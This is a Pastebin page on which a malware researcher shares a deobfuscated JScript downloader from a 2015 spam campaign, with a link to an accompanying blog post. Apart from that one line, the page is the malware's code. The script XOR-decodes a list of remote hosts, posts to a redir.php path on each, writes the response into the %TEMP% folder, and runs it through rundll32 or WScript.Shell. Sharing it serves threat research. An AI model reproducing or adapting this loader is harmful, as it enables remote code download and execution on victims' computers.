SHARE
TWEET

out2.js

bartblaze Nov 10th, 2015 (edited) 196 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Deobfuscated JS file. Related blog post: http://bartblaze.blogspot.com/2015/11/a-quick-look-at-signed-spam-campaign.html
  2.  
  3. kTEIfdmieLe8 = "au0911";
  4.  
  5. function kTEIfdmieLe5(kTEIfdmieLe6) {
  6.     return new ActiveXObject(kTEIfdmieLe6)
  7. };
  8. //// r6JLy1ijVPK
  9. //// 9eoOj
  10.  
  11. //// b81c44zCnlGhKEGFeeq
  12. //// rMgXtx1jVd3fR2
  13. function kTEIfdmieLe(jhmpYYZvkuHWkW) {
  14.     var kTEIfdmieLe4 = '9\x1a\x06f\x277w5T(*#E~###7\x19\x1d\x7f!7\x18#(,hd###2\x1d\x04~;)q?*9, \x0f#861\x0b\x0d}"4\x18/5&J\x198Y\x14\x0b\x14, \x5c\x06HB\x04\x1f\x06\x00\x1dg\x00\x05\x05\x0c=)\x1f\x10\x0bY\x0b\x1d\x0e\x17cB###.\x0d\x02`3/y8?\x276@\x0b;:ip###.\x1d\x09w$.e%5%<!\x1dZ4+7UO###3\x0b\x11s<%c 1\x27,#\x09Z86=UO###\x13, A\x13I]\x16wa'.split("###");
  15. //// U2gGxa
  16. //// v5ziPM5Ffk
  17.     if (jhmpYYZvkuHWkW == "") {
  18.         qKLIFbykNgG = "." + "d" + "l" + "l";
  19.     } else {
  20. //// vuh4k5cITe
  21. //// KGZT1FZBTij1b
  22.         qKLIFbykNgG = "." + "p" + "d" + "f";
  23.     };
  24.     for (var kRIBOVzKPU = 0; kRIBOVzKPU < kTEIfdmieLe4.length; kRIBOVzKPU++) {
  25.         var veHnYKIWjraSp = kTEIfdmieLe5("WScript.Shell");
  26. //// nugznF3J0MgFJS6
  27. //// vAjJP
  28.         sxyPxnzNV = veHnYKIWjraSp.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + qKLIFbykNgG;
  29.         bypLmkq = false;
  30.         kTEIfdmieLe0 = kTEIfdmieLe5("MSXML2.XMLHTTP");
  31.         kTEIfdmieLe0.onreadystatechange = function() {
  32.             if (4 == kTEIfdmieLe0.readyState && 200 == kTEIfdmieLe0.status) {
  33.                 var kTEIfdmieLe1 = kTEIfdmieLe5("ADODB.Stream");
  34.                 if (kTEIfdmieLe1.open(), kTEIfdmieLe1.type = 1, kTEIfdmieLe1.write(kTEIfdmieLe0.ResponseBody), 5e3 < kTEIfdmieLe1.size) {
  35.                     bypLmkq = true;
  36.                     kTEIfdmieLe1.position = 0;
  37.                     kTEIfdmieLe1.saveToFile(sxyPxnzNV, 2);
  38.                     try {
  39.                                             if (jhmpYYZvkuHWkW == "") {
  40.                                                         veHnYKIWjraSp.Exec("rundll32 " + sxyPxnzNV + ", " + "DllRegisterServer");
  41.                                             } else {
  42.                                                 veHnYKIWjraSp.Run(sxyPxnzNV, 1, 0);
  43.                                             };
  44.                     } catch (kTEIfdmieLe2) {
  45. //// uLwp7f7a4iYX4fySkVO
  46. //// AHd01oKSom
  47.                        
  48.                     };
  49. //// XEJSIvJ50CMlcrXQ8W
  50. //// l9CA25oIEjMlpDI5
  51.                 }
  52.                 kTEIfdmieLe1.close()
  53.             }
  54. //// vBJw1enjn3Wd7NMI
  55. //// FKMKp9Sj
  56.         };
  57.         try {
  58. //// 7bMQQ7rV
  59. //// 0DHAGjKxwXc0lyCHv
  60. //// KiU13559
  61. //// IaR517JKlqQjx2OsWqJs
  62.             var jjxjYcRoh = 'zXE2rg6lzkenHtwd';
  63.             var ICJCJreUdAoEDtN = kTEIfdmieLe4[kRIBOVzKPU];
  64.             for (var byQIHsqp = "", MCwLh6 = 0, MCwLh7 = 0; MCwLh6 < ICJCJreUdAoEDtN.length; MCwLh6++) byQIHsqp += String.fromCharCode(ICJCJreUdAoEDtN.charCodeAt(MCwLh6) ^ jjxjYcRoh.charCodeAt(MCwLh7)), MCwLh7++, MCwLh7 == jjxjYcRoh.length && (MCwLh7 = 0);
  65.             kTEIfdmieLe7 = "http://" + byQIHsqp + "/redir" + "." + "p" + "h" + "p";
  66.             kTEIfdmieLe0.open("POST", kTEIfdmieLe7, false);
  67.             kTEIfdmieLe0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  68.             kTEIfdmieLe0.send("JreoOoOUJvvFay=" + Math.random() + "&jndj=" + kTEIfdmieLe8 + jhmpYYZvkuHWkW);
  69.         } catch (kTEIfdmieLe3) {
  70.  
  71.         };
  72.  
  73.         if (bypLmkq) {
  74.             break;
  75.         };
  76. //// hqp4kZQUxwE
  77. //// KYrOhQ
  78.     };
  79. };
  80. //// EQr7ksuiuwZdut45a
  81. //// jCStO3r
  82.  
  83. kTEIfdmieLe("");
  84. kTEIfdmieLe("&ncm=sJzHYgdHnDZTwU");
  85. //// AEiSHdZq5
  86. //// nHsVUN2fzi
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top